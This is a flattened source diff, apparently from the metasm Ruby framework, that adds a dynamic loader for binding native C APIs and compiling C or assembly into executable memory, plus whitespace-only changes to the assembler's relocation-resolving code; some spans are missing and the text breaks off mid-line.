+ if not dir = find_write_dir + raise LoadError, "no writable dir to put the DynLdr ruby module, try to run as root" + end + binmodule = File.join(dir, fname) + end + binmodule + end + + # find a writeable directory + # searches this script directory, $HOME / %APPDATA% / %USERPROFILE%, or $TMP + def self.find_write_dir + writable = lambda { |d| + begin + foo = '/_test_write_' + rand(1<<32).to_s + true if File.writable?(d) and + File.open(d+foo, 'w') { true } and + File.unlink(d+foo) + rescue + end + } + dir = File.dirname(__FILE__) + return dir if writable[dir] + dir = ENV['HOME'] || ENV['APPDATA'] || ENV['USERPROFILE'] + if writable[dir] + dir = File.join(dir, '.metasm') + Dir.mkdir dir if not File.directory? dir + return dir + end + ENV['TMP'] || ENV['TEMP'] || '.' + end + + # CPU suitable for compiling code for the current running host + def self.host_cpu + @cpu ||= + case RUBY_PLATFORM + when /i[3-6]86/; Ia32.new + when /x86_64|x64/i; X86_64.new + else raise LoadError, "Unsupported host platform #{RUBY_PLATFORM}" + end + end + + # returns whether we run on linux or windows + def self.host_arch + case RUBY_PLATFORM + when /linux/i; :linux + when /mswin|mingw|cygwin/i; :windows + else raise LoadError, "Unsupported host platform #{RUBY_PLATFORM}" + end + end + + # ExeFormat suitable as current running host native module + def self.host_exe + case host_arch + when :linux; ELF + when :windows; PE + end + end + + # parse a C string into the @cp parser, create it if needed + def self.parse_c(src) + cp.parse(src) + end + + # compile a C fragment into a Shellcode, honors the host ABI + def self.compile_c(src) + # XXX could we reuse self.cp ? (for its macros etc) + cp = C::Parser.new(host_exe.new(host_cpu)) + cp.parse(src) + sc = Shellcode.new(host_cpu) + asm = host_cpu.new_ccompiler(cp, sc).compile + sc.assemble(asm) + end + + # retrieve the library where a symbol is to be found (uses AutoImport) + def self.lib_from_sym(symname) + case host_arch + when :linux; GNUExports::EXPORT + when :windows; WindowsExports::EXPORT + end[symname] + end + + # reads a bunch of C code, creates binding for those according to the prototypes + # handles enum/defines to define constants + # For each toplevel method prototype, it generates a ruby method in this module, the name is lowercased + # For each numeric macro/enum, it also generates an uppercase named constant + # When such a function is called with a lambda as argument, a callback is created for the duration of the call + # and destroyed afterwards ; use callback_alloc_c to get a callback id with longer life span + def self.new_api_c(proto, fromlib=nil) + proto += "\n;" # allow 'int foo()' and '#include ' + parse_c(proto) + + cp.toplevel.symbol.dup.each_value { |v| + next if not v.kind_of? C::Variable # enums + cp.toplevel.symbol.delete v.name + lib = fromlib || lib_from_sym(v.name) + addr = sym_addr(lib, v.name) + if addr == 0 or addr == -1 or addr == 0xffff_ffff or addr == 0xffffffff_ffffffff + api_not_found(lib, v) + next + end + + rbname = c_func_name_to_rb(v.name) + if not v.type.kind_of? C::Function + # not a function, simply return the symbol address + # TODO struct/table access through hash/array ? + class << self ; self ; end.send(:define_method, rbname) { addr } + next + end + next if v.initializer # inline & stuff + puts "new_api_c: load method #{rbname} from #{lib}" if $DEBUG + + new_caller_for(v, rbname, addr) + } + + # predeclare constants from enums + # macros are handled in const_missing (too slow to (re)do here everytime) + # TODO #define FOO(v) (v<<1)|1 => create ruby counterpart + cexist = constants.inject({}) { |h, c| h.update c.to_s => true } + cp.toplevel.symbol.each { |k, v| + if v.kind_of? ::Integer + n = c_const_name_to_rb(k) + const_set(n, v) if v.kind_of? Integer and not cexist[n] + end + } + + # avoid WTF rb warning: toplevel const TRUE referenced by WinAPI::TRUE + cp.lexer.definition.each_key { |k| + n = c_const_name_to_rb(k) + if not cexist[n] and Object.const_defined?(n) and v = @cp.macro_numeric(n) + const_set(n, v) + end + } + end + + # const_missing handler: will try to find a matching #define + def self.const_missing(c) + # infinite loop on autorequire C.. + return super(c) if not defined? @cp or not @cp + + cs = c.to_s + if @cp.lexer.definition[cs] + m = cs + else + m = @cp.lexer.definition.keys.find { |k| c_const_name_to_rb(k) == cs } + end + + if m and v = @cp.macro_numeric(m) + const_set(c, v) + v + else + super(c) + end + end + + # when defining ruby wrapper for C methods, the ruby method name is the string returned by this function from the C name + def self.c_func_name_to_rb(name) + n = name.to_s.gsub(/[^a-z0-9_]/i) { |c| c.unpack('H*')[0] }.downcase + n = "m#{n}" if n !~ /^[a-z]/ + n + end + + # when defining ruby wrapper for C constants (numeric define/enum), the ruby const name is + # the string returned by this function from the C name. It should follow ruby standards (1st letter upcase) + def self.c_const_name_to_rb(name) + n = name.to_s.gsub(/[^a-z0-9_]/i) { |c| c.unpack('H*')[0] }.upcase + n = "C#{n}" if n !~ /^[A-Z]/ + n + end + + def self.api_not_found(lib, func) + raise "could not find symbol #{func.name.inspect} in #{lib.inspect}" + end + + # called whenever a native API is called through new_api_c/new_func_c/etc + def self.trace_invoke(api, args) + #p api + end + + # define a new method 'name' in the current module to invoke the raw method at addr addr + # translates ruby args to raw args using the specified prototype + def self.new_caller_for(proto, name, addr) + flags = 0 + flags |= 1 if proto.has_attribute('stdcall') + flags |= 2 if proto.has_attribute('fastcall') + flags |= 4 if proto.type.type.integral? and cp.sizeof(nil, proto.type.type) == 8 + flags |= 8 if proto.type.type.float? + class << self ; self ; end.send(:define_method, name) { |*a| + raise ArgumentError, "bad arg count for #{name}: #{a.length} for #{proto.type.args.length}" if a.length != proto.type.args.length and not proto.type.varargs + + # convert the arglist suitably for raw_invoke + auto_cb = [] # list of automatic C callbacks generated from lambdas + a = a.zip(proto.type.args).map { |ra, fa| + aa = convert_rb2c(fa, ra, :cb_list => auto_cb) + if fa and fa.type.integral? and cp.sizeof(fa) == 8 and host_cpu.size == 32 + aa = [aa & 0xffff_ffff, (aa >> 32) & 0xffff_ffff] + aa.reverse! if host_cpu.endianness != :little + end + aa + }.flatten + + trace_invoke(name, a) + # do it + ret = raw_invoke(addr, a, flags) + + # cleanup autogenerated callbacks + auto_cb.each { |cb| callback_free(cb) } + + # interpret return value + ret = convert_ret_c2rb(proto, ret) + } + end + + # ruby object -> integer suitable as arg for raw_invoke + def self.convert_rb2c(formal, val, opts=nil) + case val + when String; str_ptr(val) + when Proc; cb = callback_alloc_cobj(formal, val) ; (opts[:cb_list] << cb if opts and opts[:cb_list]) ; cb + when C::AllocCStruct; str_ptr(val.str) + val.stroff + when Hash + if not formal.type.pointed.kind_of?(C::Struct) + raise "invalid argument #{val.inspect} for #{formal}, need a struct*" + end + buf = cp.alloc_c_struct(formal, val) + val.instance_variable_set('@rb2c', buf) # GC trick: lifetime(buf) >= lifetime(hash) (XXX or until next call to convert_rb2c) + str_ptr(buf.str) + #when Float; val # TODO handle that in raw_invoke C code + else + v = val.to_i rescue 0 # NaN, Infinity, etc + v = -v if v == -(1<<(cp.typesize[:ptr]*8-1)) # ruby bug... raise -0x8000_0000: out of ulong range + v + end + end + + # this method is called from the C part to run the ruby code corresponding to + # a given C callback allocated by callback_alloc_c + def self.callback_run(id, args) + cb = @@callback_table[id] + raise "invalid callback #{'%x' % id} not in #{@@callback_table.keys.map { |c| c.to_s(16) }}" if not cb + + rawargs = args.dup + ra = cb[:proto] ? cb[:proto].args.map { |fa| convert_cbargs_c2rb(fa, rawargs) } : [] + + # run it + ret = cb[:proc].call(*ra) + + # the C code expects to find in args[0] the amount of stack fixing needed for __stdcall callbacks + args[0] = cb[:abi_stackfix] || 0 + ret + end + + # C raw cb arg -> ruby object + # will combine 2 32bit values for 1 64bit arg + def self.convert_cbargs_c2rb(formal, rawargs) + val = rawargs.shift + if formal.type.integral? and cp.sizeof(formal) == 8 and host_cpu.size == 32 + if host.cpu.endianness == :little + val |= rawargs.shift << 32 + else + val = (val << 32) | rawargs.shift + end + end + + convert_c2rb(formal, val) + end + + # interpret a raw decoded C value to a ruby value according to the C prototype + # handles signedness etc + # XXX val is an integer, how to decode Floats etc ? raw binary ptr ? + def self.convert_c2rb(formal, val) + formal = formal.type if formal.kind_of? C::Variable + val = Expression.make_signed(val, 8*cp.sizeof(formal)) if formal.integral? and formal.signed? + val = nil if formal.pointer? and val == 0 + val + end + + # C raw ret -> ruby obj + # can be overridden for system-specific calling convention (eg return 0/-1 => raise an error) + def self.convert_ret_c2rb(fproto, ret) + fproto = fproto.type if fproto.kind_of? C::Variable + convert_c2rb(fproto.untypedef.type, ret) + end + + def self.cp ; @cp ||= C::Parser.new(host_exe.new(host_cpu)) ; end + def self.cp=(c); @cp = c ; end + + # allocate a callback for a given C prototype (string) + # accepts full C functions (with body) (only 1 at a time) or toplevel 'asm' statement + def self.callback_alloc_c(proto, &b) + proto += ';' # allow 'int foo()' + parse_c(proto) + v = cp.toplevel.symbol.values.find_all { |v_| v_.kind_of? C::Variable and v_.type.kind_of? C::Function }.first + if (v and v.initializer) or cp.toplevel.statements.find { |st| st.kind_of? C::Asm } + cp.toplevel.statements.delete_if { |st| st.kind_of? C::Asm } + cp.toplevel.symbol.delete v.name if v + sc = compile_c(proto) + ptr = memory_alloc(sc.encoded.length) + sc.base_addr = ptr + # TODO fixup external calls + memory_write ptr, sc.encode_string + memory_perm ptr, sc.encoded.length, 'rwx' + ptr + elsif not v + raise 'empty prototype' + else + cp.toplevel.symbol.delete v.name + callback_alloc_cobj(v, b) + end + end + + # allocates a callback for a given C prototype (C variable, pointer to func accepted) + def self.callback_alloc_cobj(proto, b) + ori = proto + proto = proto.type if proto and proto.kind_of? C::Variable + proto = proto.pointed while proto and proto.pointer? + id = callback_find_id + cb = {} + cb[:id] = id + cb[:proc] = b + cb[:proto] = proto + cb[:abi_stackfix] = proto.args.inject(0) { |s, a| s + [cp.sizeof(a), cp.typesize[:ptr]].max } if ori and ori.has_attribute('stdcall') + cb[:abi_stackfix] = proto.args[2..-1].to_a.inject(0) { |s, a| s + [cp.sizeof(a), cp.typesize[:ptr]].max } if ori and ori.has_attribute('fastcall') # supercedes stdcall + @@callback_table[id] = cb + id + end + + # releases a callback id, so that it may be reused by a later callback_alloc + def self.callback_free(id) + @@callback_table.delete id + end + + # finds a free callback id, allocates a new page if needed + def self.callback_find_id + if not id = @@callback_addrs.find { |a| not @@callback_table[a] } + cb_page = memory_alloc(4096) + sc = Shellcode.new(host_cpu, cb_page) + case sc.cpu.shortname + when 'ia32' + addr = cb_page + nrcb = 128 # TODO should be 4096/5, but the parser/compiler is really too slow + nrcb.times { + @@callback_addrs << addr + sc.parse "call #{CALLBACK_TARGET}" + addr += 5 + } + when 'x64' + addr = cb_page + nrcb = 128 # same remark + nrcb.times { + @@callback_addrs << addr + sc.parse "1: lea rax, [rip-$_+1b] jmp #{CALLBACK_TARGET}" + addr += 12 # XXX approximative.. + } + end + sc.assemble + memory_write cb_page, sc.encode_string + memory_perm cb_page, 4096, 'rx' + raise 'callback_alloc bouh' if not id = @@callback_addrs.find { |a| not @@callback_table[a] } + end + id + end + + # compile a bunch of C functions, defines methods in this module to call them + # returns the raw pointer to the code page + # if given a block, run the block and then undefine all the C functions & free memory + def self.new_func_c(src) + sc = compile_c(src) + ptr = memory_alloc(sc.encoded.length) + sc.base_addr = ptr + bd = sc.encoded.binding(ptr) + sc.encoded.reloc_externals.uniq.each { |ext| bd[ext] = sym_addr(lib_from_sym(ext), ext) or raise "unknown symbol #{ext}" } + sc.encoded.fixup(bd) + memory_write ptr, sc.encode_string + memory_perm ptr, sc.encoded.length, 'rwx' + parse_c(src) # XXX the Shellcode parser may have defined stuff / interpreted C another way... + defs = [] + cp.toplevel.symbol.dup.each_value { |v| + next if not v.kind_of? C::Variable + cp.toplevel.symbol.delete v.name + next if not v.type.kind_of? C::Function or not v.initializer + next if not off = sc.encoded.export[v.name] + rbname = c_func_name_to_rb(v.name) + new_caller_for(v, rbname, ptr+off) + defs << rbname + } + if block_given? + begin + yield + ensure + defs.each { |d| class << self ; self ; end.send(:remove_method, d) } + memory_free ptr + end + else + ptr + end + end + + # compile an asm sequence, callable with the ABI of the C prototype given + # function name comes from the prototype + def self.new_func_asm(proto, asm) + proto += "\n;" + old = cp.toplevel.symbol.keys + parse_c(proto) + news = cp.toplevel.symbol.keys - old + raise "invalid proto #{proto}" if news.length != 1 + f = cp.toplevel.symbol[news.first] + raise "invalid func proto #{proto}" if not f.name or not f.type.kind_of? C::Function or f.initializer + cp.toplevel.symbol.delete f.name + + sc = Shellcode.assemble(host_cpu, asm) + ptr = memory_alloc(sc.encoded.length) + bd = sc.encoded.binding(ptr) + sc.encoded.reloc_externals.uniq.each { |ext| bd[ext] = sym_addr(lib_from_sym(ext), ext) or raise "unknown symbol #{ext}" } + sc.encoded.fixup(bd) + memory_write ptr, sc.encode_string + memory_perm ptr, sc.encoded.length, 'rwx' + rbname = c_func_name_to_rb(f.name) + new_caller_for(f, rbname, ptr) + if block_given? + begin + yield + ensure + class << self ; self ; end.send(:remove_method, rbname) + memory_free ptr + end + else + ptr + end + end + + # allocate a C::AllocCStruct to hold a specific struct defined in a previous new_api_c + def self.alloc_c_struct(structname, values={}) + cp.alloc_c_struct(structname, values) + end + + # return a C::AllocCStruct mapped over the string (with optionnal offset) + # str may be an EncodedData + def self.decode_c_struct(structname, str, off=0) + str = str.data if str.kind_of? EncodedData + cp.decode_c_struct(structname, str, off) + end + + # allocate a C::AllocCStruct holding an Array of typename variables + # if len is an int, it holds the ary length, or it can be an array of initialisers + # eg alloc_c_ary("int", [4, 5, 28]) + def self.alloc_c_ary(typename, len) + cp.alloc_c_ary(typename, len) + end + + # return a C::AllocCStruct holding an array of type typename mapped over str + def self.decode_c_ary(typename, len, str, off=0) + cp.decode_c_ary(typename, len, str, off) + end + + # return an AllocCStruct holding an array of 1 element of type typename + # access its value with obj[0] + # useful when you need a pointer to an int that will be filled by an API: use alloc_c_ptr('int') + def self.alloc_c_ptr(typename, init=nil) + cp.alloc_c_ary(typename, (init ? [init] : 1)) + end + + # return the binary version of a ruby value encoded as a C variable + # only integral types handled for now + def self.encode_c_value(var, val) + cp.encode_c_value(var, val) + end + + # decode a C variable + # only integral types handled for now + def self.decode_c_value(str, var, off=0) + cp.decode_c_value(str, var, off) + end + + # read a 0-terminated string from memory + def self.memory_read_strz(ptr, szmax=4096) + # read up to the end of the ptr memory page + pglim = (ptr + 0x1000) & ~0xfff + sz = [pglim-ptr, szmax].min + data = memory_read(ptr, sz) + return data[0, data.index(?\0)] if data.index(?\0) + if sz < szmax + data = memory_read(ptr, szmax) + data = data[0, data.index(?\0)] if data.index(?\0) + end + data + end + + # read a 0-terminated wide string from memory + def self.memory_read_wstrz(ptr, szmax=4096) + # read up to the end of the ptr memory page + pglim = (ptr + 0x1000) & ~0xfff + sz = [pglim-ptr, szmax].min + data = memory_read(ptr, sz) + if i = data.unpack('v*').index(0) + return data[0, 2*i] + end + if sz < szmax + data = memory_read(ptr, szmax) + data = data[0, 2*i] if i = data.unpack('v*').index(0) + end + data + end + + # automatically build/load the bin module + start + + case host_arch + when :windows + + new_api_c < PAGE_READONLY, 'rw' => PAGE_READWRITE, 'rx' => PAGE_EXECUTE_READ, - 'rwx' => PAGE_EXECUTE_READWRITE }[perm.to_s.downcase] - virtualprotect(addr, len, perm, str_ptr([0].pack('C')*8)) - end - - when :linux - - new_api_c < PAGE_READONLY, 'rw' => PAGE_READWRITE, 'rx' => PAGE_EXECUTE_READ, + 'rwx' => PAGE_EXECUTE_READWRITE }[perm.to_s.downcase] + virtualprotect(addr, len, perm, str_ptr([0].pack('C')*8)) + end + + when :linux + + new_api_c < 1) ? assemble_resolve(ary) : ary.shift - edata.fixup edata.binding - edata - end + edata = (ary.length > 1) ? assemble_resolve(ary) : ary.shift + edata.fixup edata.binding + edata + end - # chose among multiple possible sub-EncodedData - # assumes all ambiguous edata have the equivallent relocations in the same order - def assemble_resolve(ary) - startlabel = new_label('section_start') + # chose among multiple possible sub-EncodedData + # assumes all ambiguous edata have the equivallent relocations in the same order + def assemble_resolve(ary) + startlabel = new_label('section_start') - # create two bindings where all elements are the shortest/longest possible - minbinding = {} - minoff = 0 - maxbinding = {} - maxoff = 0 + # create two bindings where all elements are the shortest/longest possible + minbinding = {} + minoff = 0 + maxbinding = {} + maxoff = 0 - ary.each { |elem| - case elem - when Array - if elem.all? { |ed| ed.kind_of? EncodedData and ed.reloc.empty? } - elem = [elem.sort_by { |ed| ed.length }.first] - end - elem.each { |e| - e.export.each { |label, off| - minbinding[label] = Expression[startlabel, :+, minoff + off] - maxbinding[label] = Expression[startlabel, :+, maxoff + off] - } - } - minoff += elem.map { |e| e.virtsize }.min - maxoff += elem.map { |e| e.virtsize }.max + ary.each { |elem| + case elem + when Array + if elem.all? { |ed| ed.kind_of? EncodedData and ed.reloc.empty? } + elem = [elem.sort_by { |ed| ed.length }.first] + end + elem.each { |e| + e.export.each { |label, off| + minbinding[label] = Expression[startlabel, :+, minoff + off] + maxbinding[label] = Expression[startlabel, :+, maxoff + off] + } + } + minoff += elem.map { |e| e.virtsize }.min + maxoff += elem.map { |e| e.virtsize }.max - when EncodedData - elem.export.each { |label, off| - minbinding[label] = Expression[startlabel, :+, minoff + off] - maxbinding[label] = Expression[startlabel, :+, maxoff + off] - } - minoff += elem.virtsize - maxoff += elem.virtsize + when EncodedData + elem.export.each { |label, off| + minbinding[label] = Expression[startlabel, :+, minoff + off] + maxbinding[label] = Expression[startlabel, :+, maxoff + off] + } + minoff += elem.virtsize + maxoff += elem.virtsize - when Align - minoff += 0 - maxoff += elem.val - 1 + when Align + minoff += 0 + maxoff += elem.val - 1 - when Padding - # find the surrounding Offsets and compute the largest/shortest edata sizes to determine min/max length for the padding - prevoff = ary[0..ary.index(elem)].grep(Offset).last - nextoff = ary[ary.index(elem)..-1].grep(Offset).first - raise elem, 'need .offset after .pad' if not nextoff + when Padding + # find the surrounding Offsets and compute the largest/shortest edata sizes to determine min/max length for the padding + prevoff = ary[0..ary.index(elem)].grep(Offset).last + nextoff = ary[ary.index(elem)..-1].grep(Offset).first + raise elem, 'need .offset after .pad' if not nextoff - # find all elements between the surrounding Offsets - previdx = prevoff ? ary.index(prevoff) + 1 : 0 - surround = ary[previdx..ary.index(nextoff)-1] - surround.delete elem - if surround.find { |nelem| nelem.kind_of? Padding } - raise elem, 'need .offset beetween two .pad' - end - if surround.find { |nelem| nelem.kind_of? Align and ary.index(nelem) > ary.index(elem) } - raise elem, 'cannot .align after a .pad' # XXX really ? - end + # find all elements between the surrounding Offsets + previdx = prevoff ? ary.index(prevoff) + 1 : 0 + surround = ary[previdx..ary.index(nextoff)-1] + surround.delete elem + if surround.find { |nelem| nelem.kind_of? Padding } + raise elem, 'need .offset beetween two .pad' + end + if surround.find { |nelem| nelem.kind_of? Align and ary.index(nelem) > ary.index(elem) } + raise elem, 'cannot .align after a .pad' # XXX really ? + end - # lenmin/lenmax are the extrem length of the Padding - nxt = Expression[nextoff.val] - ext = nxt.externals - raise elem, "bad offset #{nxt}" if ext.length > 1 or (ext.length == 1 and not minbinding[ext.first]) - nxt = Expression[nxt, :-, startlabel] if not nxt.bind(minbinding).reduce.kind_of? ::Integer - prv = Expression[prevoff ? prevoff.val : 0] - ext = prv.externals - raise elem, "bad offset #{prv}" if ext.length > 1 or (ext.length == 1 and not minbinding[ext.first]) - prv = Expression[prv, :-, startlabel] if not prv.bind(minbinding).reduce.kind_of? ::Integer + # lenmin/lenmax are the extrem length of the Padding + nxt = Expression[nextoff.val] + ext = nxt.externals + raise elem, "bad offset #{nxt}" if ext.length > 1 or (ext.length == 1 and not minbinding[ext.first]) + nxt = Expression[nxt, :-, startlabel] if not nxt.bind(minbinding).reduce.kind_of? ::Integer + prv = Expression[prevoff ? prevoff.val : 0] + ext = prv.externals + raise elem, "bad offset #{prv}" if ext.length > 1 or (ext.length == 1 and not minbinding[ext.first]) + prv = Expression[prv, :-, startlabel] if not prv.bind(minbinding).reduce.kind_of? ::Integer - lenmin = Expression[nxt.bind(minbinding), :-, prv.bind(maxbinding)].reduce - lenmax = Expression[nxt.bind(maxbinding), :-, prv.bind(minbinding)].reduce - raise elem, "bad labels: #{lenmin}" if not lenmin.kind_of? ::Integer or not lenmax.kind_of? ::Integer - surround.each { |nelem| - case nelem - when Array - lenmin -= nelem.map { |e| e.virtsize }.max - lenmax -= nelem.map { |e| e.virtsize }.min - when EncodedData - lenmin -= nelem.virtsize - lenmax -= nelem.virtsize - when Align - lenmin -= nelem.val - 1 - lenmax -= 0 - end - } - raise elem, "no room for .pad before '.offset #{nextoff.val}' at #{Backtrace.backtrace_str(nextoff.backtrace)}, need at least #{-lenmax} more bytes" if lenmax < 0 - minoff += [lenmin, 0].max - maxoff += lenmax + lenmin = Expression[nxt.bind(minbinding), :-, prv.bind(maxbinding)].reduce + lenmax = Expression[nxt.bind(maxbinding), :-, prv.bind(minbinding)].reduce + raise elem, "bad labels: #{lenmin}" if not lenmin.kind_of? ::Integer or not lenmax.kind_of? ::Integer + surround.each { |nelem| + case nelem + when Array + lenmin -= nelem.map { |e| e.virtsize }.max + lenmax -= nelem.map { |e| e.virtsize }.min + when EncodedData + lenmin -= nelem.virtsize + lenmax -= nelem.virtsize + when Align + lenmin -= nelem.val - 1 + lenmax -= 0 + end + } + raise elem, "no room for .pad before '.offset #{nextoff.val}' at #{Backtrace.backtrace_str(nextoff.backtrace)}, need at least #{-lenmax} more bytes" if lenmax < 0 + minoff += [lenmin, 0].max + maxoff += lenmax - when Offset - # nothing to do for now - else - raise "Internal error: bad object #{elem.inspect} in encode_resolve" - end - } + when Offset + # nothing to do for now + else + raise "Internal error: bad object #{elem.inspect} in encode_resolve" + end + } - # checks an expression linearity - check_linear = lambda { |expr| - expr = expr.reduce if expr.kind_of? Expression - while expr.kind_of? Expression - case expr.op - when :* - if expr.lexpr.kind_of? Numeric; expr = expr.rexpr - elsif expr.rexpr.kind_of? Numeric; expr = expr.lexpr - else break - end - when :/, :>>, :<< - if expr.rexpr.kind_of? Numeric; expr = expr.lexpr - else break - end - when :+, :- - if not expr.lexpr; expr = expr.rexpr - elsif expr.lexpr.kind_of? Numeric; expr = expr.rexpr - elsif expr.rexpr.kind_of? Numeric; expr = expr.lexpr - else - break if not check_linear[expr.rexpr] - expr = expr.lexpr - end - else break - end - end + # checks an expression linearity + check_linear = lambda { |expr| + expr = expr.reduce if expr.kind_of? Expression + while expr.kind_of? Expression + case expr.op + when :* + if expr.lexpr.kind_of? Numeric; expr = expr.rexpr + elsif expr.rexpr.kind_of? Numeric; expr = expr.lexpr + else break + end + when :/, :>>, :<< + if expr.rexpr.kind_of? Numeric; expr = expr.lexpr + else break + end + when :+, :- + if not expr.lexpr; expr = expr.rexpr + elsif expr.lexpr.kind_of? Numeric; expr = expr.rexpr + elsif expr.rexpr.kind_of? Numeric; expr = expr.lexpr + else + break if not check_linear[expr.rexpr] + expr = expr.lexpr + end + else break + end + end - not expr.kind_of? Expression - } + not expr.kind_of? Expression + } - # now we can resolve all relocations - # for linear expressions of internal variables (ie differences of labels from the ary): - # - calc target numeric bounds, and reject relocs not accepting worst case value - # - else reject all but largest place available - # then chose the shortest overall EData left - ary.map! { |elem| - case elem - when Array - # for each external, compute numeric target values using minbinding[external] and maxbinding[external] - # this gives us all extrem values for linear expressions - target_bounds = {} - rec_checkminmax = lambda { |idx, target, binding, extlist| - if extlist.empty? - (target_bounds[idx] ||= []) << target.bind(binding).reduce - else - rec_checkminmax[idx, target, binding.merge(extlist.last => minbinding[extlist.last]), extlist[0...-1]] - rec_checkminmax[idx, target, binding.merge(extlist.last => maxbinding[extlist.last]), extlist[0...-1]] - end - } - # biggest size disponible for this relocation (for non-linear/external) - wantsize = {} + # now we can resolve all relocations + # for linear expressions of internal variables (ie differences of labels from the ary): + # - calc target numeric bounds, and reject relocs not accepting worst case value + # - else reject all but largest place available + # then chose the shortest overall EData left + ary.map! { |elem| + case elem + when Array + # for each external, compute numeric target values using minbinding[external] and maxbinding[external] + # this gives us all extrem values for linear expressions + target_bounds = {} + rec_checkminmax = lambda { |idx, target, binding, extlist| + if extlist.empty? + (target_bounds[idx] ||= []) << target.bind(binding).reduce + else + rec_checkminmax[idx, target, binding.merge(extlist.last => minbinding[extlist.last]), extlist[0...-1]] + rec_checkminmax[idx, target, binding.merge(extlist.last => maxbinding[extlist.last]), extlist[0...-1]] + end + } + # biggest size disponible for this relocation (for non-linear/external) + wantsize = {} - elem.each { |e| - e.reloc.sort.each_with_index { |r_, i| - r = r_[1] - # has external ref - if not r.target.bind(minbinding).reduce.kind_of?(Numeric) or not check_linear[r.target] - # find the biggest relocation type for the current target - wantsize[i] = elem.map { |edata| - edata.reloc.sort[i][1].type - }.sort_by { |type| Expression::INT_SIZE[type] }.last # XXX do not use rel.length - else - rec_checkminmax[i, r.target, {}, r.target.externals] - end - } - } + elem.each { |e| + e.reloc.sort.each_with_index { |r_, i| + r = r_[1] + # has external ref + if not r.target.bind(minbinding).reduce.kind_of?(Numeric) or not check_linear[r.target] + # find the biggest relocation type for the current target + wantsize[i] = elem.map { |edata| + edata.reloc.sort[i][1].type + }.sort_by { |type| Expression::INT_SIZE[type] }.last # XXX do not use rel.length + else + rec_checkminmax[i, r.target, {}, r.target.externals] + end + } + } - # reject candidates with reloc type too small - acceptable = elem.find_all { |edata| - r = edata.reloc.sort - (0...r.length).all? { |i| - if wantsize[i] - r[i][1].type == wantsize[i] - else - target_bounds[i].all? { |b| Expression.in_range?(b, r[i][1].type) } - end - } - } + # reject candidates with reloc type too small + acceptable = elem.find_all { |edata| + r = edata.reloc.sort + (0...r.length).all? { |i| + if wantsize[i] + r[i][1].type == wantsize[i] + else + target_bounds[i].all? { |b| Expression.in_range?(b, r[i][1].type) } + end + } + } - raise EncodeError, "cannot find candidate in #{elem.inspect}, immediate too big #{wantsize.inspect} #{target_bounds.inspect}" if acceptable.empty? + raise EncodeError, "cannot find candidate in #{elem.inspect}, immediate too big #{wantsize.inspect} #{target_bounds.inspect}" if acceptable.empty? - # keep the shortest - acceptable.sort_by { |edata| edata.virtsize }.first - else - elem - end - } + # keep the shortest + acceptable.sort_by { |edata| edata.virtsize }.first + else + elem + end + } - # assemble all parts, resolve padding sizes, check offset directives - edata = EncodedData.new + # assemble all parts, resolve padding sizes, check offset directives + edata = EncodedData.new - # fills edata with repetitions of data until targetsize - fillwith = lambda { |targetsize, data| - if data - if data.reloc.empty? and not data.data.empty? # avoid useless iterations - nr = (targetsize-edata.virtsize) / data.length - 1 - if nr > 0 - dat = data.data.ljust(data.virtsize, 0.chr) - edata << (dat * nr) - end - end - while edata.virtsize + data.virtsize <= targetsize - edata << data - end - if edata.virtsize < targetsize - edata << data[0, targetsize - edata.virtsize] - end - else - edata.virtsize = targetsize - end - } + # fills edata with repetitions of data until targetsize + fillwith = lambda { |targetsize, data| + if data + if data.reloc.empty? and not data.data.empty? # avoid useless iterations + nr = (targetsize-edata.virtsize) / data.length - 1 + if nr > 0 + dat = data.data.ljust(data.virtsize, 0.chr) + edata << (dat * nr) + end + end + while edata.virtsize + data.virtsize <= targetsize + edata << data + end + if edata.virtsize < targetsize + edata << data[0, targetsize - edata.virtsize] + end + else + edata.virtsize = targetsize + end + } - ary.each { |elem| - case elem - when EncodedData - edata << elem - when Align - fillwith[EncodedData.align_size(edata.virtsize, elem.val), elem.fillwith] - when Offset - raise EncodeError, "could not enforce .offset #{elem.val} #{elem.backtrace}: offset now #{edata.virtsize}" if edata.virtsize != Expression[elem.val].bind(edata.binding(0)).reduce - when Padding - nextoff = ary[ary.index(elem)..-1].grep(Offset).first - targetsize = Expression[nextoff.val].bind(edata.binding(0)).reduce - ary[ary.index(elem)+1..ary.index(nextoff)-1].each { |nelem| targetsize -= nelem.virtsize } - raise EncodeError, "no room for .pad #{elem.backtrace_str} before .offset #{nextoff.val}, would be #{targetsize-edata.length} bytes long" if targetsize < edata.length - fillwith[targetsize, elem.fillwith] - else raise "Internal error: #{elem.inspect}" - end - } + ary.each { |elem| + case elem + when EncodedData + edata << elem + when Align + fillwith[EncodedData.align_size(edata.virtsize, elem.val), elem.fillwith] + when Offset + raise EncodeError, "could not enforce .offset #{elem.val} #{elem.backtrace}: offset now #{edata.virtsize}" if edata.virtsize != Expression[elem.val].bind(edata.binding(0)).reduce + when Padding + nextoff = ary[ary.index(elem)..-1].grep(Offset).first + targetsize = Expression[nextoff.val].bind(edata.binding(0)).reduce + ary[ary.index(elem)+1..ary.index(nextoff)-1].each { |nelem| targetsize -= nelem.virtsize } + raise EncodeError, "no room for .pad #{elem.backtrace_str} before .offset #{nextoff.val}, would be #{targetsize-edata.length} bytes long" if targetsize < edata.length + fillwith[targetsize, elem.fillwith] + else raise "Internal error: #{elem.inspect}" + end + } - edata - end + edata + end end class Expression - def encode(type, endianness, backtrace=nil) - case val = reduce - when Integer; EncodedData.new Expression.encode_imm(val, type, endianness, backtrace) - else EncodedData.new([0].pack('C')*(INT_SIZE[type]/8), :reloc => {0 => Relocation.new(self, type, endianness, backtrace)}) - end - end + def encode(type, endianness, backtrace=nil) + case val = reduce + when Integer; EncodedData.new Expression.encode_imm(val, type, endianness, backtrace) + else EncodedData.new([0].pack('C')*(INT_SIZE[type]/8), :reloc => {0 => Relocation.new(self, type, endianness, backtrace)}) + end + end - class << self - def encode_imm(val, type, endianness, backtrace=nil) - type = INT_SIZE.keys.find { |k| k.to_s[0] == ?a and INT_SIZE[k] == 8*type } if type.kind_of? ::Integer - endianness = endianness.endianness if not endianness.kind_of? ::Symbol - raise "unsupported endianness #{endianness.inspect}" unless [:big, :little].include? endianness - raise(EncodeError, "immediate overflow #{type.inspect} #{Expression[val]} #{(Backtrace::backtrace_str(backtrace) if backtrace)}") if not in_range?(val, type) - s = (0...INT_SIZE[type]/8).map { |i| (val >> (8*i)) & 0xff }.pack('C*') - endianness != :little ? s.reverse : s - end - alias encode_immediate encode_imm - end + class << self + def encode_imm(val, type, endianness, backtrace=nil) + type = INT_SIZE.keys.find { |k| k.to_s[0] == ?a and INT_SIZE[k] == 8*type } if type.kind_of? ::Integer + endianness = endianness.endianness if not endianness.kind_of? ::Symbol + raise "unsupported endianness 